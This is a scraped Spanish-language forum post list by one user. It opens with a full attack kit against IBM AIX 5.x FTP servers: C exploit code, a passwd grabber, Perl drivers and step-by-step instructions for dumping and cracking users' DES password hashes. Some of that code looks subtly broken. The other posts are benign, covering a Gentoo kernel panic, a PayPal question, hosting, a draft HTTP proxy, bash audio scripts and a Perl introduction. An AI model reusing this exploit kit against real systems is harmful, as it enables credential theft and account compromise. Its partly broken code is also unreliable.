| |
 Mostrar Temas
|
|
Páginas: [1] 2
|
|
1
|
Seguridad Informática / Bugs y Exploits / [CODE|ATAQUE REMOTO] ub-aix-ftpd-attack IBM AIX 5.1, 5.2, 5.3, quiza anteriores
|
en: 21 Enero 2012, 18:04 pm
|
Hola, les dejo el código que hice para un ataque completo basado en el exploit de Kingcope. El volcado es de los hashes DES de AIX, los mismos que están en /etc/security/passwd. Version: Version de prueba 1.0
Lenguajes: C, Perl
Sistemas Vulnerables: IBM AIX 5l - 5.1, 5.2, 5.3 y probablemente 4.X
Parche Existente: Si, http://aix.software.ibm.com/aix/efixes/security/ftpd_advisory.asc
Vulnerabilidad descubierta por: Kingcope
Nivel de compromiso: Todos los usuarios con FTP ven comprometido su hash DES, passwords fuertes no se ven comprometidos a corto plazo (John the Ripper tardará un poco más)
Información necesaria: Un usuario y password válido en el sistema. En algunos funcionará un default.
Datos adicionales: Estos sistemas también tienen una configuración por defecto de Sendmail que permite usarlos como Relay sin privilegios para el envío de correo electrónico.
Es una versión de prueba, no la probé luego de los últimos cambios. Se podría intentar borrar el core luego del ataque.
MAY THE SOURCE BE WITH YOU... Archivo: READMEThis attack is based in:
* IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
*
* Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
*
* bug found & exploited by Kingcope
Credits for the vulnerability to Kingcope
Complete attack step by step:
a) Build (make) in the LHOST (you) in a NEW directory
b) Having a system's user/pass for AIX, use 'get-passwd' and get /etc/passwd by FTP
c) Having /etc/passwd as 'passwd' in your LHOST, run ub-aix-ftpd-attack.pl
This script reads passwd file getting usernames. Then, it uses provided valid
user/pass for the exploit, wich dumps a 'core' forcing a segmentation fault in
'FTPd'. Unpatched systems will dump core files containing the last failed
login hash, from /etc/security/passwd, so we filled memory with our victim user.
But the Kingcope exploit gets lots of strings from core files (by using 'strings' command),
so this script uses lots of dumps then...
d) Finally, you will get REAL hashes for users, by comparison, kicking off unusable
strings from dumps, and getting a real copy of /etc/security/passwd for every
user configured to FTPd... even root if it can FTP. To do this, use provided ukosh.pl
Now, a first eye on the passwords is done by running John the Ripper and stopping it after weakest passwords are revealed.
And you have all of the weak passwords instantly. Then, take a look at the retrieved passwd file
to see if you have some admin or potential staff member, or any interesting user.
If you don't have the pass, but the hash, use John the Ripper in a cluster, get some dictionary based on the system, you will crack it since... AIX cuts long passwords to 8 digits for the DES hash ;) # it's for AIX (xlc), LINUX (gcc), or any other, just change CC
all: get-passwd exploit
CC:=gcc
get-passwd: get-passwd.c
@echo ">> compiling [$(CC)] $@"
@$(CC) -o get-passwd get-passwd.c
exploit: exploit.c
@echo ">> compiling [$(CC)] $@"
@$(CC) -o exploit exploit.c
clean:
-rm exploit get-passwd
/* * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :> * * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too * * bug found & exploited by Kingcope * exploit modified by UnsafeBit to fit full system passwords attack * * Version 3.0 - January 2012 * ---------------------------------------------------------------------------- * Description: - * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied - * For example: NLST ~AAAAA...A (2000 A's should be enough) - * The fun part here is that it creates a coredump file in the current - * directory if it is set writable by the logged in user. - * The goal of the exploit is to get the DES encrypted user hashes - * off the server. These can be later cracked with JtR. - * This is accomplished by populating the memory with logins of the user - * we would like the encrypted hash from. Logging in three times with the - * target username should be enough so that the DES hash is included in the - * 'core' file. - * The FTPd banner looks like below. - * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. - * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. - * ---------------------------------------------------------------------------- */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <fcntl.h> #define RIDICULOUS_PASSWD "QqQqQqQq" #define USAGE_STRING \ "%s <-r rhost(victim)> <-l lhost(you)> [-p port] [-u username] [-k password]"\ " [-d some rhost writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n" int createconnection(char *target, char *targetport); void sockgetline(int socketd); void putline(int socketd, char *out); void usage(char *exe); static int exploit_oops; void exploit_say(char *sayit) { } void exploit_failed(char *sayit) { exploit_oops++; } char in[8096]; char out[8096]; int main(int argc, char *argv[]) { extern int optind; extern char *optarg; int haveuser=0,havepassword=0; int socketd,s2,nsock; int c,k,len; int fd; exploit_oops = 0; char *target = NULL; char *username = "ftp"; char *password = "guest"; char *writeto = "pub"; char *crackme = "root"; char *targetport = "21"; int uselist = 0; char *myip = NULL; char *as = NULL; int octet_in[4], port; struct sockaddr_in yo, cli; char *oct = NULL; while ((c = getopt(argc, argv, "r:l:p:u:k:d:c:s")) != EOF) { switch(c) { case 'r': break; case 'l': break; case 'p': break; case 'u': haveuser = 1; break; case 'k': havepassword = 1; break; case 'd': break; case 'c': break; case 's': uselist = 1; break; default: usage(argv[0]); } } if (target == NULL || myip == NULL) usage(argv[0]); if ((haveuser && !havepassword) || (!haveuser && havepassword)) { usage(argv[0]); } socketd = createconnection(target, targetport); sockgetline(socketd); exploit_say("forcing poor FTPd to load DES hash in memory"); for (k=0;k<3;k++) { snprintf(out , sizeof out , "USER %s\r\n", crackme ); putline(socketd, out); sockgetline(socketd); snprintf(out , sizeof out , "PASS "RIDICULOUS_PASSWD "\r\n"); putline(socketd,out); sockgetline(socketd); } snprintf(out , sizeof out , "USER %s\r\n", username ); putline(socketd, out); sockgetline(socketd); snprintf(out , sizeof out , "PASS %s\r\n", password ); putline(socketd,out); sockgetline(socketd); sockgetline(socketd); exploit_say("injecting venom"); snprintf(out , sizeof out , "CWD %s\r\n", writeto ); putline(socketd, out); sockgetline(socketd); as[2000-1] = 0; if (!uselist) { snprintf(out , sizeof out , "NLST ~%s\r\n", as ); } else { /* AIX 5.3 trigger - thanks to karol */ snprintf(out , sizeof out , "LIST ~%s\r\n", as ); } putline(socketd, out); if (recv(socketd, in, sizeof in, 0) < 1) { exploit_say("exploit succeeded!"); } else { exploit_say("trigger seems to have failed, proceeding anyways (sometimes, it will work anyways)"); } sleep(5); close(socketd); socketd = createconnection(target, targetport); sockgetline(socketd); snprintf(out , sizeof out , "USER %s\r\n", username ); putline(socketd, out); sockgetline(socketd); snprintf(out , sizeof out , "PASS %s\r\n", password ); putline(socketd,out); sockgetline(socketd); sockgetline(socketd); snprintf(out , sizeof out , "CWD %s\r\n", writeto ); putline(socketd, out); sockgetline(socketd); exploit_say("getting core file"); snprintf(out , sizeof out , "TYPE I\r\n"); putline(socketd, out); sockgetline(socketd); port = getpid() + 1024; len = sizeof(cli); bzero(&yo, sizeof(yo)); yo.sin_family = AF_INET; yo.sin_port=htons(port); yo.sin_addr.s_addr = htonl(INADDR_ANY); snprintf(out , sizeof out , "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in [0], octet_in [1], octet_in [2], octet_in [3], port / 256, port % 256); putline(socketd, out); sockgetline(socketd); if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) { return -1; } if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) { close(s2); } if (listen(s2, 10) < 0) { close(s2); } snprintf(out , sizeof out , "RETR core\r\n"); putline(socketd, out); sockgetline(socketd); if (strstr(in , "150") == NULL ) { exploit_failed("core file not found... terminating"); close(socketd); } fd = open("core", O_WRONLY | O_CREAT); if (fd == -1) { perror("open on local core file"); close(socketd); } sleep(1); if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) { close(socketd); } do { k = recv(nsock, in, sizeof in, 0); if (k < 1) break; write(fd, in, k); } while (k > 0); close(nsock); close(fd); close(socketd); exploit_say("extracting DES hashes"); char strings_command[255]; memset(strings_command , 0, sizeof strings_command ); sprintf(strings_command , "chmod 754 core"); memset(strings_command , 0, sizeof strings_command ); fprintf(stderr , "+ command: '%s'\n", strings_command ); return 0; } int createconnection(char *target, char *targetport) { struct addrinfo hints, *res; int socketd; memset(&hints , 0, sizeof hints ); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if (getaddrinfo(target, targetport, &hints, &res)) { } socketd = socket(res->ai_family, res->ai_socktype, res->ai_protocol); if (socketd < 0) { } if (connect(socketd, res->ai_addr, res->ai_addrlen) < 0) { } return socketd; } void sockgetline(int socketd) { if (recv(socketd, in, sizeof in, 0) < 1) { close(socketd); } } void putline(int socketd, char *out) { if (send (socketd , out , strlen(out ), 0) == -1) { close(socketd); } } void usage(char *exe) { fprintf(stderr , USAGE_STRING , exe ); }
Archivo: get-passwd.c/* * IBM AIX 5l FTPd Remote DES Hash Exploit * This file will use a known user to get /etc/passwd file * * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too * * Version 1.0 - Jan 2012 * ---------------------------------------------------------------------------- */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <fcntl.h> #define USAGE_STRING \ "%s <-r rhost(victim)> <-l lhost(you)> [-p port] [-u username] [-k password]" int createconnection(char *target, char *targetport); void sockgetline(int socketd); void putline(int socketd, char *out); void usage(char *exe); static int exploit_oops; void exploit_say(char *sayit) { } void exploit_failed(char *sayit) { exploit_oops++; } char in[8096]; char out[8096]; int main(int argc, char *argv[]) { extern int optind; extern char *optarg; int haveuser=0,havepassword=0; int socketd,s2,nsock; int c,k,len; int fd; exploit_oops = 0; char *target = NULL; char *username = "ftp"; char *password = "guest"; char *writeto = "pub"; char *targetport = "21"; char *myip = NULL; char *as = NULL; int octet_in[4], port; struct sockaddr_in yo, cli; char *oct = NULL; while ((c = getopt(argc, argv, "r:l:p:u:k:")) != EOF) { switch(c) { case 'r': break; case 'l': break; case 'p': break; case 'u': haveuser = 1; break; case 'k': havepassword = 1; break; default: usage(argv[0]); } } if (target == NULL || myip == NULL) usage(argv[0]); if ((haveuser && !havepassword) || (!haveuser && havepassword)) { usage(argv[0]); } socketd = createconnection(target, targetport); sockgetline(socketd); snprintf(out , sizeof out , "USER %s\r\n", username ); putline(socketd, out); /* username */ sockgetline(socketd); snprintf(out , sizeof out , "PASS %s\r\n", password ); putline(socketd,out); /* passwd */ sockgetline(socketd); sockgetline(socketd); exploit_say("RETRIEVING /etc/passwd"); snprintf(out , sizeof out , "CWD /etc\r\n"); putline(socketd, out); sockgetline(socketd); snprintf(out , sizeof out , "TYPE I\r\n"); putline(socketd, out); sockgetline(socketd); port = getpid() + 1024; len = sizeof(cli); bzero(&yo, sizeof(yo)); yo.sin_family = AF_INET; yo.sin_port=htons(port); yo.sin_addr.s_addr = htonl(INADDR_ANY); snprintf(out , sizeof out , "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in [0], octet_in [1], octet_in [2], octet_in [3], port / 256, port % 256); putline(socketd, out); sockgetline(socketd); if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) { return -1; } if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) { close(s2); } if (listen(s2, 10) < 0) { close(s2); } snprintf(out , sizeof out , "RETR passwd\r\n"); putline(socketd, out); sockgetline(socketd); if (strstr(in , "150") == NULL ) { exploit_failed("passwd file not found... terminating"); close(socketd); } fd = open("passwd", O_WRONLY | O_CREAT); if (fd == -1) { perror("open on local passwd file"); close(socketd); } sleep(1); if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) { close(socketd); } do { k = recv(nsock, in, sizeof in, 0); if (k < 1) break; write(fd, in, k); } while (k > 0); close(nsock); close(fd); close(socketd); return 0; } int createconnection(char *target, char *targetport) { struct addrinfo hints, *res; int socketd; memset(&hints , 0, sizeof hints ); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if (getaddrinfo(target, targetport, &hints, &res)) { } socketd = socket(res->ai_family, res->ai_socktype, res->ai_protocol); if (socketd < 0) { } if (connect(socketd, res->ai_addr, res->ai_addrlen) < 0) { } return socketd; } void sockgetline(int socketd) { if (recv(socketd, in, sizeof in, 0) < 1) { close(socketd); } } void putline(int socketd, char *out) { if (send (socketd , out , strlen(out ), 0) == -1) { close(socketd); } } void usage(char *exe) { fprintf(stderr , USAGE_STRING , exe ); }
Archivo: ub-aix-ftpd-attack.pl#!/usr/bin/env perl die "need arguments: <LHOST> <RHOST> <VALID_USER> <VALID_PASSWORD>" unless (scalar @ARGV eq 4); my $F; while (<F>) { ($login, $passwd, $uid, $gid, $gcos, $home, $shell) = split(/:/); print "+ E X P L O I T I N G U S E R : [$login]\n"; system("./blow-up -r $ARGV[1] -l $ARGV[0] -u $ARGV[2] -k $ARGV[3] -d /tmp -c $login"); }
Archivo: ukosh.pl#!/usr/bin/env perl # # 'unlock core shadows' (ukosh.pl) takes corefile 13 digit strings # from AIX 5.2 vulnerable FTPd hashdumps and, by comparison, takes # candidate user hashes # # you can do it yourself, but this script can take an /etc/passwd dump # for thousands of users, and get hashes in a second, so you can just # start cracking (John the Ripper in a cluster is the fastest way) # # %crack_user = ( username => '$', # complete_list => '@', ); # each user has lots of "maybe" passwords our @users_data; # the array of 'crack_user' elements our $number_of_files = 0; our @word_hash; # array of word-times, if a word appears in almost all of the files # then it is a core residual string, but not a password hash use IO::Handle; sub map_user() { ($trash,$username) = split(/\./,$_[0]); our $number_of_files++; our @users_data; my @list; my %crack_user; my $File; open File , "< $_[0]" || die "cannot open $_[0]"; while (<File>) { push @list, $_ unless (/^$/); } $crack_user{complete_list}=\@list; $crack_user{username}=$username; push @users_data, \%crack_user unless ($crack_user{username }=~/^$/); } sub sum_word() { my %word_times; my $found; #print "size of array: ", scalar @word_hash, "\n" $found=0; die "need a word, wht! [$_[0]]\n" if $_[0] =~ /^$/; for my $ix ( 0..scalar @word_hash ) { if ( $word_hash[$ix]->{word} =~ /^$_[0]$/ ) { $word_hash[$ix]->{times}++; $found=1; } } if ($found eq 0) { if ($_[0] =~ /^$/) { } else { $word_times{word}=$_[0]; push @word_hash, \%word_times; } } } opendir(my $this_dir, ".") or die "cannot open current dir"; print "reading directory "; flush STDOUT; # each password file will be attended &map_user($_) if (/^passwd\.[a-z|0-9]+$/); } print "\nloaded $number_of_files files\n"; print "mapping and counting words "; # fills comparison hash for $i ( 0..scalar @users_data ) { flush STDOUT; for (@{$users_data[$i]->{complete_list}}) { &sum_word($_); } } print "\nguessing /etc/security/passwd file? }:)\n"; # for each possible line my $SEC_PASSWD; my $CAN_WRITE=1; open SEC_PASSWD , "> security-passwd" || $CAN_WRITE=0; if ($CAN_WRITE eq 1) { print "writing to file 'security-passwd'...\n"; } print "---------------------------------------------\n"; for $i ( 0..scalar @users_data ) { for (@{$users_data[$i]->{complete_list}}) { for my $ix ( 0..scalar @word_hash ) { if ($word_hash[$ix]->{word} !~ /^$/){ if ($word_hash[$ix]->{word} =~ /^$_$/){ if ($word_hash[$ix]->{times} eq 1) { print "$users_data[$i]->{username}:$word_hash[$ix]->{word}\n"; if ($CAN_WRITE eq 1) { print SEC_PASSWD "$users_data[$i]->{username}:$word_hash[$ix]->{word}\n"; } } } } } } } print "---------------------------------------------\n";
Espero comentarios, mejoras, etc... Saludos y Happy Hacking |
|
|
|
|
2
|
Programación / Programación General / [proyecto] Nuevo controlador de versiones
|
en: 11 Noviembre 2011, 16:00 pm
|
|
Hola Foreros,
Solamente paso para escribirles sobre un proyecto que estoy empezando. Tras bastante tiempo de uso de GIT, hay algunas cosas que me planteo diferentes. No es porque GIT sea malo, ni quiero volver esto una discusión sobre la necesidad de otro controlador de versiónes.
Se que muchos aficionados a Shell, C y Perl, pueden estar entusiasmados por trabajar en un proyecto así, y espero llegue a ser competente.
Quienes sepan trabajar en equipo y de una forma respetuosa, son bienvenidos.
Escriban MPs y/o correo a soft.d4rio (en) GMail para recibir alguna instrucción sobre qué hacer.
Saludos
PD: El proyecto se escribe en inglés, aunque la organización de las tareas la estoy haciendo en castellano. Cualquiera puede participar porque siempre habrá alguien dispuesto a traducir y explicar.
|
|
|
|
|
3
|
Sistemas Operativos / GNU/Linux / Kernel Panic Gentoo - root ext4
|
en: 29 Junio 2011, 02:31 am
|
Hola gente, Paso a explicarles el problema: Tenia Ubuntu 11.04 instalado en la partición /dev/sda5 Me hice un LiveUSB de Gentoo11 a partir del liveDVD, desde el cual instalé el sistema con el stage3 gentoo-hardened Bajé los fuentes del kernel de hardened Con make menuconfig hice la configuración de un kernel con ext4 compilado (no modulo) porque la partición raíz tiene ext4. Para no tener que armar la configuración de un cargador de arranque, entre en Ubuntu y corrí la actualización de GRUB2 para que reconozca Gentoo, cosa que hizo. Reinicié, y ohh!! Kernel Panic. Para hacerlo más simple y obtener solo lo necesario, agregué "quiet" a la línea de comandos del kernel. Ahora, reiniciando nuevamente, puedo dar el error: kvm: no hardware support
Kernel Panic - not syncing: VFS: unable to mount root fs on unknown-block (0,0)
swapper not tainted 2.6.38-<mi kernel>Cosa que no se como solucionar. Si el kernel no tuviera soporte para ext4 bien, pero con el soporte para ext4 builtin ¿? Voy a tratar de reiniciar sin la swap en el fstab, pero como no pudo montar el raiz, supongo que no tendrá nada que ver... sino trataré con genkernel Si alguien tiene una sugerencia, bienvenido sea saludos EDITO (AGREGO): Modifique la función que arroja el kernel panic (mount_block_root()) en init/do_mounts.c, queda como indico a continuación: void __init mount_block_root(char *name, int flags) { char *fs_names = __getname_gfp(GFP_KERNEL | __GFP_NOTRACK_FALSE_POSITIVE); char *p; #ifdef CONFIG_BLOCK char b[BDEVNAME_SIZE]; #else const char *b = name; #endif printk("D4RIO: mount_block_root([%s],[%d])\n",name,flags); printk("D4RIO: fs_names before gfn: [%s]\n",fs_names); get_fs_names(fs_names); printk("D4RIO: fs_names after gfn: [%s]\n",fs_names); retry: for (p = fs_names ; *p ; p += strlen(p )+1) { int err = do_mount_root(name, p, flags, root_mount_data); switch (err) { case 0: goto out; case -EACCES: flags |= MS_RDONLY; goto retry; case -EINVAL: continue; } /* * Allow the user to distinguish between failed sys_open * and bad superblock on root device. * and give them a list of the available devices */ #ifdef CONFIG_BLOCK __bdevname(ROOT_DEV, b); #endif printk("VFS: Err open root=\"%s\", listing:\n", root_device_name); printk_all_partitions(); #ifdef CONFIG_DEBUG_BLOCK_EXT_DEVT printk("DEBUG_BLOCK_EXT_DEVT is enabled, you need to specify " "explicit textual name for \"root=\" boot option.\n"); #endif panic("VFS: Cant mount root fs on %s", b); } printk("List of all partitions:\n"); printk_all_partitions(); printk("No filesystem could mount root, tried: "); for (p = fs_names ; *p ; p += strlen(p )+1) printk(" %s", p); printk("\n"); #ifdef CONFIG_BLOCK __bdevname(ROOT_DEV, b); #endif panic("VFS: Unable to mount root fs on %s", b); out: putname(fs_names); }
Como verán, agregué unas trazas muy vistosas con valores que no se trazan en el original, el resultado: D4RIO: mount_block_root([/dev/root],[32769])
D4RIO: fs_names before gfn: [/dev/root]
D4RIO: fs_names after gfn: [ext3]
VFS: Err open root="sda6", listing:
Kernel panic - not syncing: VFS: Cant mount root fs on unknown-block(0,0)
Pid: 1, comm: swapper Not tainted 2.6.38-hardened-r6dario-hardened1 #3
Call Trace:
[<c1379439>] ? panic+0x4d/0x129
[<c1592c72>] ? mount_block_root+0x210/0x224
[<c1592cbf>] ? mount_root+0x39/0x4d
[<c1592e15>] ? prepare_namespace+0x142/0x168
[<c1592400>] ? kernel_init+0x196/0x1a6
[<c159226a>] ? kernel_init+0x0/0x1a6
[<c1027f86>] ? kernel_thread_helper+0x6/0x10No me gusta ese ext3, pero no tengo tiempo ahora para ponerme a mirarlo. Será hasta mañana! |
|
|
|
|
4
|
Programación / PHP / PHP+PayPal (u otros gateways)
|
en: 10 Junio 2011, 04:38 am
|
|
Hola,
Leyendo sobre la interfaz de PayPal me he encontrado con algunos inconvenientes... este es mi ejemplo ilustrativo:
Supongamos que quiero implementar una interfaz propia con PayPal u otro Payment Gateway en PHP. Supongamos también que tengo una página en la que se pueden elegir *diversos* productos con *diversos* precios, quitando la opción de crear un botón en PayPal y pegar el código.
Entonces tengo unos datos X en PHP, con una venta esperando pago. El usuario debe redirigirse para poder pagar con tarjeta, e inmediatamente luego de pagar, ser capaz de obtener un código de descarga, o datos de contacto (caso de MercadoLibre/eBay).
Como es inmediato, no hay trabajo de backoffice como pegar un número de factura, o un monto a nombre de X persona (como pasa a veces con las compañías de hosting)... NO: El usuario debe pagar y descargar. Pagar y ver datos. Pagar y que reaccionemos.
¿Cómo implementarían algo así?
|
|
|
|
|
5
|
Programación / Desarrollo Web / PHP, Perl, o Python?
|
en: 31 Mayo 2011, 13:32 pm
|
|
Hola amigos,
Si, hoy estoy ON-FIRE con las dudas Web (si 2 preguntas califican como on-fire)
La pregunta es simple: A la hora de procesar datos, especialmente en tiempo real, pero hablando generalmente ¿qué les parece mejor? ¿con cuál tuvieron mejor experiencia? ¿porqué?
Comenzaré comentando que usé PHP, y también Perl, aunque NUNCA para procesamiento de páginas web. Se que en Google usan Python, y facebook usa PHP pero... ¿ventajas? ¿desventajas?
Les abro la pizarra...
|
|
|
|
|
6
|
Programación / Desarrollo Web / Permisos de descarga en servidores HTTP
|
en: 31 Mayo 2011, 13:24 pm
|
|
Hola gente,
Mi duda es la siguiente: Si tenemos un servicio X, donde un usuario tiene almacenado un archivo en nuestra web, ¿cómo controlamos que este usuario sea el único en poder descargar el fichero?
A este punto estoy suponiendo que no hubo autenticación HTTP, por ejemplo un webmail o un foro.
¿Cómo controlar que realmente SOLO USUARIOS tienen acceso real al archivo?
¿Cómo lo harían?
|
|
|
|
|
7
|
Comunicaciones / Redes / Contratar Hosting o Poner Server?
|
en: 30 Mayo 2011, 14:29 pm
|
|
Hola amigos,
Mi pregunta del día de hoy viene por este lado: Todos sabemos que si vas a poner una web para tu empresa o algo por el estilo, contratas un hosting, registras el dominio y ya.
Ahora supongamos esto: Un proyecto de empresa totalmente web, con un flujo importante de datos. Algo como que digamos "los inventores de Google" o un nuevo webmail o lo que sea. ¿Contratas un hosting o pones un server propio?
Ahora vamos más adentro. En un país como Argentina, donde la velocidad y el ancho de banda no son cosas que sobren... ¿cómo te las arreglas para montar una arquitectura de red de digamos... 1.000.000 de usuarios? ¿Cómo te aseguras no tener un cuello de botella que deje a la mitad de tus usuarios sin servicio? ¿Qué haces si de repente tu cantidad de usuarios sube como si se tratara de una inundación?
Creo que es algo que representaría un desafío de arquitecturas de red. ¿Cómo hacés para no crashear y morir?
|
|
|
|
|
8
|
Programación / Programación C/C++ / [C] HTTP-PROXY
|
en: 1 Marzo 2011, 00:03 am
|
Hola gente, hace tiempo que no posteo. Un amigo estaba viendo cómo hacer un proxy http y me pasó un draft para que le eche un vistazo. La verdad es que hace rato que no veo nada de sockets, y menos de HTTP. Quizá cuando tenga un rato le eche un vistazo capturando paquetes para ver si trabaja como debe, mientras tanto se los dejo para que me den opiniones / mejoras / comentarios, y jueguen un rato capturando paquetes. # include <stdio.h> # include <sys/types.h> # include <sys/socket.h> # include <sys/time.h> # include <sys/param.h> # include <sys/file.h> # include <netinet/in.h> # include <netdb.h> # include <ctype.h> # include <string.h> # include <stdlib.h> # include <errno.h> # include <limits.h> # define ERR 5; # define DATA 3; # define ACK 4; # define BLOQUE 516; # define DIR_SERVIDOR 100; FILE *archivo; FILE *archivo2; //20 char no_arch[20]; char nom_arch[20]; char error[1024]; char resp[1024]; char data[516]; char data2[516]; char ack[1024]; char Met[5]= "post\0"; uint16_t error_tipo, ack_tipo, cod, tipo; int socketserv, nro_frag, cant, n, socketcli, posi; struct sockaddr_in extremoRemoto; struct sockaddr_in enlace; char buffer[512]; char recibido[512]; void codigoError() // Establece el codigo de error que voy a mandar en el paquete ERR al cliente { switch (errno) { case 2: cod-1; break; case 5: cod-2; break; } } int timeout(int fd, int sec) /*Controla el timeout. Devuelve 0 si se termino el timeout, -1 en caso de error y un valor positivo si hay un evento pendiente*/ { fd_set conj_lectura; struct timeval tiempo; int r; FD_ZERO(&conj_lectura); FD_SET(fd, &conj_lectura); tiempo.tv_sec=sec; tiempo.tv_usec=0; r=select(FD_SETSIZE, &conj_lectura, NULL,NULL,&tiempo); } void metodo() {// este metodo selecciona post / head. //Anulado //Met[1]= "p"; //Met[2]= "o"; //Met[3]= "s"; //Met[4]= "t"; //Met[5]= "\0"; } void busca_archivo(int j) { int compa; if (compa==0) { posi=j; } else { j++; (void)busca_archivo(j); } } int main() { int sd,sdc,lon,ar; struct sockaddr_in ser,cli; ser.sin_family=AF_INET; ser.sin_port=htons(80); ser.sin_addr.s_addr=INADDR_ANY; char archi[512]; posi=0; sd=socket(PF_INET,SOCK_STREAM,0); if (bind(sd,(struct sockaddr *) &ser,sizeof(ser)) < 0) { } listen(sd,5); while (1) { lon=sizeof(cli); sdc= accept(sd,(struct sockaddr *) &cli, &lon); ar=recv(sdc,buffer,sizeof(buffer),0); (void)busca_archivo(1); int sock_serv,con,env,rcv,envbro; struct sockaddr_in server; server.sin_family=AF_INET; server.sin_port=htons(80); server.sin_addr.s_addr=DIR_SERVIDOR; sock_serv=socket(PF_INET,SOCK_STREAM,0); con=connect(sock_serv,(struct sockaddr *)&server,sizeof(server)); if (con!=0) { perror("Error en Conectar con el Servidor: "); } else { env=send(sock_serv,buffer,sizeof(sock_serv),0); rcv=recv(sock_serv,recibido,sizeof(recibido),0); if (rcv>=0) { envbro=send(sdc,recibido,rcv,0); } } close(sock_serv); close(sdc); } close(sd); }
Saludos, Happy Hacking |
|
|
|
|
9
|
Programación / Scripting / BASH mp32wav, wav2mp3 - p/linuxeros
|
en: 21 Diciembre 2008, 16:33 pm
|
Hola amigos, hoy les dejo unos escrits (  ) ... es decir scripts (  ) para el shell de Unix, especifya saben como icamente probados en bash. Usan ffmpeg para transformar archivos mp3 a wav y viceversa. No es nada raro, pero es util y sirve para ver a bash en accion. Tal vez la parte más interesante es cómo usar las expansiones de variables para crear los nombres nuevos, es decir, cambiar un holahola.wav a holahola.mp3... o tal vez a alguno le interese cómo es el tema de los colores en la consola, que ahi aparece. Como sea, si tienen preguntas haganlas. Y no me vengan con comparar BASH con BATCH!!  Compartan ambos bajo GPLv2 #!/bin/bash ################################################################################ # AUTOR: Dario A. Rodriguez # # Convierte los ficheros MP3 de un directorio a WAV usando ffmpeg # ################################################################################ if [ $# -eq 0 ] then FILES=`ls --color=never ./*.mp3`; else case $1 in "-h") echo "USAGE:" echo " mp32wav <file1.mp3> [<file2.mp3> <file3.mp3> ...]" echo " Transform all given files to WAV" echo " mp32wav -f <text_file>" echo " Transform all files listed in the given text file to WAV" echo " mp32wav" echo " Transform all the mp3 files in the directory to WAV" echo " this is case sensitive (only mp3, not MP3)" exit 0 ;; "-f") FILES=`cat $2` ;; *) FILES="$*" ;; esac fi for fn in $FILES do noextfn=${fn%.mp3} newfn="${noextfn}.wav" echo -e "\033[1m$fn\033[0m -------> \033[1m$newfn\033[0m" ffmpeg -i $fn $newfn done
#!/bin/bash ################################################################################ # AUTOR: Dario A. Rodriguez # # Convierte los ficheros WAV de un directorio a MP3 usando ffmpeg # ################################################################################ if [ $# -eq 0 ] then FILES=`ls --color=never ./*.mp3`; else case $1 in "-h") echo "USAGE:" echo " wav2mp3 <file1.mp3> [<file2.mp3> <file3.mp3> ...]" echo " Transform all given files to MP3" echo " wav2mp3 -f <text_file>" echo " Transform all files listed in the given text file to MP3" echo " wav2mp3" echo " Transform all the mp3 files in the directory to MP3" echo " this is case sensitive (only wav, not WAV)" exit 0 ;; "-f") FILES=`cat $2` ;; *) FILES="$*" ;; esac fi for fn in $FILES do noextfn=${fn%.wav} newfn="${noextfn}.mp3" echo -e "\033[1m$fn\033[0m -------> \033[1m$newfn\033[0m" ffmpeg -i $fn $newfn done
|
|
|
|
|
10
|
Programación / Scripting / -=PERL=-
|
en: 20 Febrero 2008, 23:39 pm
|
#-=PERL=-# Bueno, vi el manual de Python de TxShack y me interesó su comentario acerca de Python vs Perl ... No te enojes, no es competencia, pero se me dio por hacer éste mini-manual de Perl ya que AMO a este lenguaje desde la primera vez que lo use... Me interese por PERL cuando en uno de los conocidos manuales de hacking (mayormente) inofensivo leí la frase: "PERL es el Lenguaje Amigo-Del-Hacker" Desde entonces paso un largo tiempo hasta que agarré un manual de Perl... pero desde la primer aplicación no dejé de usarlo compulsivamente hasta hoy. Creado en 1987 por Larry Wall como herramienta que llenaba los huecos dejados básicamente por AWK y SED. Ha influido a Python, PHP, Ruby, ECMAScript entre otros, corre en gran cantidad de Sistemas Operativos, se distribuye bajo la Licencia Artística o bajo la GPL. Quisiera agregar que NO Abarcare todo el lenguaje ni sus trucos ni mucho menos, ya que Perl es uno de los lenguajes más extensos que conozco. En todo caso, hay interminable documentación incluida en perldoc (y cuando digo interminable hablo en serio). Perl es un lenguaje complejo, MUUUY AMPLIO que ofrece un sinfin de posibilidades de las más variadas. Para que sirve PERL?:No es por ser mala onda pero si todavía tenés ésta duda ¡LEE LO ANTERIOR! - Perl sirve prácticamente para todo lo que desees. La inmensa cantidad de módulos que se han programado para Perl lo hace un lenguaje Amplio y Ampliable. Pero a todo ésto ¿Como es PERL?:Su sintáxis es muy similar a la de C, pero a diferencia de éste, Perl no es tan estructurado, y yá en éste punto es necesario mencionar el lema de Perl : "SIEMPRE HAY MÁS DE UNA FORMA DE HACERLO"... y eso es marca registrada. Cuando escribes Perl puedes elegir entre miles de formas de hacer lo mismo. Otra cosa a saber es que "SEGURAMENTE ALGUIEN YA HIZO UN MÓDULO PARA LO QUE NECESITO". Perl es un lenguaje muy extensible y es en gran parte gracias a los módulos. No veremos ahora esa parte específicamente, pero basta saber que los módulos nos facilitarán la vida muchísimo, al punto que ejecutar comandos en una máquina remota se vuelve cuestión de unas cuantas líneas... creando una conexión en unas eficaces dos o tres líneas ( 